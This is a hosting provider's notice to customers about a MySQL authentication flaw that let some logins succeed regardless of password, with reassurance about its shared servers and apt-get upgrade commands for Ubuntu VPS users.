Late yesterday evening, a security flaw was discovered in MySQL’s authentication system.

Without going into too much detail (links explaining the technical details of the exploit are at the end of this post), some versions of MySQL will allow a successful login 1 in 256 times regardless of password (the username does seemingly have to be correct). Please note that this is not a vulnerability exclusive to Heart Internet in any way; it’s within MySQL’s authentication system.

Most MySQL installations don’t allow root access over the network in a default install (and indeed are recommended not to be enabled), so the username part is still providing some protection.

After checking our own database servers and our customer webservers (the servers you use to host your sites), we can confirm that we are not vulnerable. If you’re hosted on the shared platform (so Starter Pro, Home Pro, Business Pro and Reseller Pro hosting on either Linux or Windows) or you have a dedicated server, then you do not need to worry or take any action.

Upgrading MySQL for VPS with Ubuntu

However, as part of responsible disclosure, we do know that some MySQL versions bundled with Ubuntu are affected; if you have an Ubuntu VPS with us, you should upgrade MySQL immediately. From a command prompt:

As root:

apt-get install mysql-server

Or, using sudo (the more ‘Ubuntu’ type way):

sudo apt-get install mysql-server

More information

For more information on the exploit, please see:

• MySQL Password Flaw

• A tragically comedic security flaw in MySQl

If you have any questions or concerns, please do not hesitate to contact us by raising a support ticket.

If you have web hosting elsewhere, you should contact your web host to find out if you need to take any steps to secure your websites.